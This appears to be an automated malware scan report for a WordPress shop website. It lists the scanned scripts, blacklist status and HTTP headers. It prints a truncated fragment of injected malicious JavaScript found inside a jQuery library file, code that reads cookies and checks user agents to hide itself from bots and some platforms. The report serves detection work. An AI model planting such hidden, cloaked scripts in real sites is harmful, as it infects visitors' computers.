Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shop.l-ri.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Scanned pages/files
Request | Server response | Status |
http://shop.l-ri.com/ | 200 OK Content-Length: 8121 Content-Type: text/html | clean |
http://shop.l-ri.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96849 Content-Type: application/x-javascript | clean |
http://shop.l-ri.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8242 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t=void 0==
Antivirus reports:
https://ajaxzip3.googlecode.com/svn/trunk/ajaxzip3/ajaxzip3-https.js | 200 OK Content-Length: 5354 Content-Type: text/plain | clean |
http://ajaxzip3.googlecode.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://ajaxzip3.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://shop.l-ri.com//www.google.com/ | 200 OK Content-Length: 25193 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: l-ri.com
http://shop.l-ri.com/wp-content/plugins/usc-e-shop/js/usces_cart.js | 200 OK Content-Length: 1342 Content-Type: application/x-javascript | clean |
http://static.evernote.com/noteit.js | 200 OK Content-Length: 63754 Content-Type: application/javascript | clean |
http://shop.l-ri.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/x-javascript | clean |
http://shop.l-ri.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3 | 200 OK Content-Length: 9658 Content-Type: application/x-javascript | clean |
http://shop.l-ri.com/wp-content/plugins/social/assets/social.js?ver=2.11 | 200 OK Content-Length: 15409 Content-Type: application/x-javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201440 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Octaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://shop.l-ri.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.0 | 200 OK Content-Length: 2001 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shop.l-ri.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 04:03:28 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/1oKhO>; rel=shortlink
Set-Cookie: uk4f2cada28dd90=7fdf6bbcf83f466a1d8354e2b7e8c2f5; path=/
X-Died: timeout at scan.pm line 1546.
X-Pingback: http://shop.l-ri.com/xmlrpc.php
X-Powered-By: PHP/5.3.15
Second query (visit from search engine):
GET / HTTP/1.1
Host: shop.l-ri.com
Referer: http://www.google.com/search?q=shop.l-ri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.